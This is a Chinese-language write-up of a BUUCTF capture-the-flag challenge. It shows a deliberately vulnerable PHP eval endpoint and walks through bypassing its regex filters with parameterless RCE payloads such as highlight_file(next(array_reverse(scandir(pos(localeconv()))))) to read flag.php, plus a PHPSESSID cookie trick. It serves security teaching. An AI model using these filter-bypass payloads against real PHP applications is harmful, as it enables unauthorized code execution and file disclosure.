RCE-无参数执行

考点

最近在buuctf上遇到了一个无参数执行的RCE，补充了下知识。
题目链接：buuctf禁止套娃。考查了以下知识，

• .git泄露
• PHP正则表达式
• 无参数RCE绕过

解题WP

打开一看没有任何提示，找了下robots.txt也没有结果，用bp抓包也没有结果。dirsearch扫以下发现.git泄露，用GitHack还原了文件，得到index.php。
如下：

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦！");
            }
        }
        else{
            die("再好好想想！");
        }
    }
    else{
        die("还想读flag，臭弟弟！");
    }
}
// highlight_file(__FILE__);
?>

绕过三层即可进行命令执行，第一层和第三层好理解可能无法理解第二个正则表达式是什么意思。
/[a-z,_]+\((?R)?\)/，(?R)引用当前正则表达式，(?R)?递归调用当前正则表达式。这条PHP语句的整体意思是只允许ab(cd(e()));这样的参数通过。
这就是RCE的无参数执行。现在我们要想办法读取flag.php源码。

获取文件名flag.php

因为不能输入flag.php，所以要想办法得到flag.php。scandir('.')可以扫描当前目录下的文件，问题在于如何获得.

获取scandir(’.’)中的.

localeconv() 函数返回一包含本地数字及货币格式信息的数组,该数组的第一值就是.。current()返回数组单元的第一个值。所以current(localeconv()) 永远都是.。pos()和current()函数有同样的效果，都是返回数组单元的第一个值。

如何截取flag.php

array_reverse()翻转

通过exp=var_dump(scandir(pos(localeconv())));可以得到

但是我们需要flag.php,现在的问题是如何截取它。
flag.php是倒数第二个值，如果它位于倒数第一个位置end()就可以截取。位于倒数第二个位置，可以先利用array_reverse()翻转数组然后next()。截取到flag.php。
如此拿到flag.php。exp=var_dump(next(array_reverse(scandir(pos(localeconv())))));

session_id(session_start())

使用 session 之前需要通过 session_start() 告诉 PHP 使用 session，php 默认是不主动使用 session 的。session_id()可以获取到当前的 session id。

同时我们要手动设置request请求包里的cookie：PHPSESSID=flag.php

获取flag.php源代码

因为过滤了et所以file_get_contents无法使用，但是我们依旧可以利用readfile()和show_source()以及highlight_file()读取源代码。构造payload
exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));。

参考文章：简析GXY_CTF “禁止套娃”无参数RCE。